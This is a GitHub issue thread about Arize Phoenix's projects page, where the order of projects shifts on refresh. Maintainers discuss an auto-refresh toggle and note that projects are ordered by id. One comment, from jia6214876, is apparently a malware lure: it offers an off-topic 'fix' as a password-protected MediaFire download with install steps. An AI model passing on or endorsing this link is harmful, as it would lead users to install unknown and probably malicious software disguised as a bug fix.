### ISSUE TITLE
[BUG] ensure that the order of projects remains stable and does not change as more projects are loaded

### ISSUE THREAD

**Issue by axiomofjoy** [Arize-ai/phoenix#4399]
Users are reporting that the order of projects is changing when the projects page is refreshed.

See #4398

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by axiomofjoy** [comment]
As of `arize-phoenix 4.31.0`, users should be able to disable project auto-refresh so they can scroll all the way to the last of their projects. This issue is not fully resolved, we will need a projects table eventually.

**Comment by RogerHYang** [comment]
fwiw, this issue may be a red-herring since projects are always ordered by `id`.

https://github.com/Arize-ai/phoenix/blob/15a619c62cc22e3f0f504b680148d1ec9830147c/src/phoenix/server/api/queries.py#L202-L202
